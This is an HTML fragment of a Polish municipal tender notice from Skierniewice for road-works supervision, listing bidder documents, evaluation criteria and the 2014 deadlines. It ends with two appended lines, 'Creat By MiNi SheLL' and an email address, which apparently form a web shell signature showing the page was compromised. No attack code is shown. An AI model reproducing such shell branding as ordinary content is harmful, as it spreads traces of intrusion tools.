<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oferta wykonawcy - wg wzoru stanowiącego załącznik nr 1 do SIWZ; 
2.Oświadczenie o spełnianiu warunków udziału w postępowaniu zawartych w art. 22, ust. 1 ustawy Pzp - wg wzoru stanowiącego załącznik nr 2 do SIWZ;
3. Oświadczenie o braku podstaw do wykluczenia na podstawie art. 24 ust. 1 ustawy Pzp - wg wzoru stanowiącego załącznik nr 2a do SIWZ; 
4.Zobowiązanie do udostępnienia potencjału technicznego lub osób zdolnych do należytego wykonania zamówienia- wg załącznika 3. Jeśli wykonawca nie będzie korzystał potencjału technicznego i osób wówczas w załączniku nr 3 wpisuje - Nie Dotyczy.
5. Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrole jakości lub kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami - wg załącznika nr 4; 6.Oświadczenie Wykonawcy, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - wg załącznika nr 5; 
7.Wykaz wykonanych lub wykonywanych głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane, oraz z załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie, co najmniej dwóch usług polegających na sprawowaniu nadzoru nad robotami budowlanymi polegającymi na budowie lub rozbudowie lub przebudowie drogi o wartości każdej usługi nie mniejszej niż 90 000,00 zł brutto (dziewięćdziesiąt tysięcy złotych brutto) a wartość każdej roboty (wraz z robotami towarzyszącymi) wynosiła nie mniej niż 6 000 000,00 zł brutto (sześć milionów złotych brutto) podobnych z rodzaju do przedmiotu zamówienia - zgodnie z załącznikiem nr 6. Za roboty podobne z rodzaju do przedmiotu zamówienia uznaje się wykonanie budowy lub rozbudowy lub przebudowy drogi (wraz z robotami towarzyszącymi) o wartości minimum 6 000 000,00 zł brutto. 
8. Informację o przynależności do grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt. ustawy Pzp wraz z listą podmiotów należących do tej samej grupy kapitałowej, lub informację o tym, że nie należy do grupy kapitałowej - wg wzoru stanowiącego załącznik nr 7 do SIWZ. 9.Pełnomocnictwo, o którym mowa w pkt. 11.3 .SIWZ (jeśli jest wymagane). 10.W przypadku wykonawców występujących wspólnie na podstawie art. 23 ustawy Pzp do oferty należy dołączyć dokumenty: -pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego, o którym mowa w art. 23 ustawy Pzp, -dokumenty wymienione w punktach od 8.1.3 do 8.1.6 i 8.1.11 SIWZ muszą być złożone przez każdy podmiot.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany postanowień zawartej umowy w zakresie: przedłużenia terminu realizacji, terminów płatności, zmiany osób wskazanych do pełnienia funkcji inspektora nadzoru poszczególnych branż. Zamawiający może wyrazić zgodę na zmianę postanowień umowy pod warunkiem, że zmiany te nie będą niekorzystne dla Zamawiającego lub (w przypadku zmiany terminu realizacji zadania) wynikać będą z okoliczności nieprzewidzianych i niezawinionych przez Wykonawcę (np.: warunki pogodowe, odmienne od przyjętych w dokumentacji warunki terenowe, zwłoka lub odmowa w wydawaniu pozwoleń i uzgodnień przez odpowiednie urzędy, konieczność usunięcia błędów w dokumentacji projektowej). Zmiana postanowień umowy może być dokonana tylko poprzez zawarcie pisemnego aneksu pomiędzy stronami</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.um.skierniewice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Skierniewice, ul. Rynek 1, 96-100 Skierniewice, Wydział Dróg i Komunikacji pok. 12 przy ul. Floriana 9.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.04.2014 godzina 11:30, miejsce: Urząd Miasta Skierniewice, ul. Rynek 1, 96-100 Skierniewice, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com